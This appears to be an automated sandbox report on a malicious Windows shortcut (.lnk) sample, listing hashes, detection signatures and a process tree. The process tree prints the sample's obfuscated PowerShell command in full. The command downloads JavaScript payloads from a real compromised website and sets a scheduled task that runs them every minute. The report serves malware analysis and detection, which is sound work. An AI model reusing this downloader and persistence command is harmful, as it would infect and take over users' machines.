Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
22/03/2025, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk
Resource
win7-20240729-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk
Resource
win10v2004-20250313-en
15 signatures
150 seconds
General
-
Target
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk
-
Size
1KB
-
MD5
202ee916a0113699880cc2e48a73d353
-
SHA1
85d9b74b2afa5bf0320e746a2871ef614159db2e
-
SHA256
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb
-
SHA512
c729137c2680e98e9686d6a2368e184fc38897032d0d0bf1e1c5a84530cc45208bfc60085be768c027d4ce52b627a7f308458ac5ed480c32289bc5a0d7c0a35e
Score
6/10
Malware Config
Signatures
-
pid Process 2904 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2904 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1976 wrote to memory of 2904 1976 cmd.exe 31 PID 1976 wrote to memory of 2904 1976 cmd.exe 31 PID 1976 wrote to memory of 2904 1976 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('htphwirvsci9k5.js jycqenaew'); $getf='Dow'+'nl'+'oadF'+'ile'; $x5yd46kp30cefn911gg = New-Object Net.WebClient; $wscs = 'wscript '; $x5yd46kp30cefn911gg.$getf('https://casettalecese.it/wp-content/uploads/2022/10/hemigastrectomySDur.php', 'htphwirvsci9k5.js'); . ('curl.e'+'xe') -s -o cs5c09hr6xij 'https://casettalecese.it/wp-content/uploads/2022/10/bivalviaGrr.php'; mv cs5c09hr6xij 'jycqenaew.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $pdw) /tn jycqenaew;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-